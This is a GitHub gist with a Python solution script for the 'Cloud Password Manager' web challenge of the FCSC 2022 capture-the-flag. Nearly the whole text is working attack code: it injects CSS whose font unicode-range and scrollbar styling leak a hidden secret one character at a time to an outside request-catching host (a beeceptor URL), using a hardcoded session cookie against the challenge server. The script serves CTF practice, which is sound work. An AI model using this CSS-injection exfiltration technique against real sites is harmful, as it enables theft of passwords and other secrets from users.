Skip to content

Instantly share code, notes, and snippets.

@xl00t
Created June 1, 2023 08:33
Show Gist options
  • Save xl00t/4db165dbbe700faca4e6b04696aa1122 to your computer and use it in GitHub Desktop.
Save xl00t/4db165dbbe700faca4e6b04696aa1122 to your computer and use it in GitHub Desktop.
FCSC 2022 | Web | Cloud Password Manager
charset = string.ascii_uppercase + string.digits
template = """
@font-face{
font-family: def;
src: url(/static/fonts/Georgia.ttf);
}
@font-face{
font-family: poc;
src: url(/static/fonts/GeorgiaBold.ttf);
unicode-range: U+00{ord};
}
#p1{
font-family: poc, def;
width: 126px;
white-space: nowrap;
overflow-x: auto;
}
div::-webkit-scrollbar { background: blue; }
div::-webkit-scrollbar:horizontal{ --x: url(https://azazaz.free.beeceptor.com/?{chr}); background: var(--x); }
"""
cookies = {"session":".eJwlzkkOwjAMAMC_5MzBS-Oln0FJbAuuLT0h_g4S84J5t3sdeT7a_jquvLX7M9reVkCEOgSJGC2YlJNh1BZWgktFS5mla5aQW-cqohHOaCyGnDK4PCsmz6XQsTvg6mNYqRo62YDBuIE7jZwboYRP31wmWK3VfpHrzOO_MWyfL9Q0Lvk.YnFHxg.-bjlO2Uvf6oYbMzrQ-R6wTuBkPo"}
def create_template(c):
style = template.replace('{ord}', hex(ord(c))[2:]).replace('{chr}', c)
return style
def test_char(c):
style = create_template(c)
requests.post("https://cloud-password-manager.france-cybersecurity-challenge.fr/style", cookies=cookies, data={"style_content":style})
time.sleep(8)
requests.post("https://cloud-password-manager.france-cybersecurity-challenge.fr/upload", cookies=cookies)
time.sleep(8)
def main():
for c in charset:
print(hex(ord(c))[2:], c)
test_char(c)
if __name__ == '__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment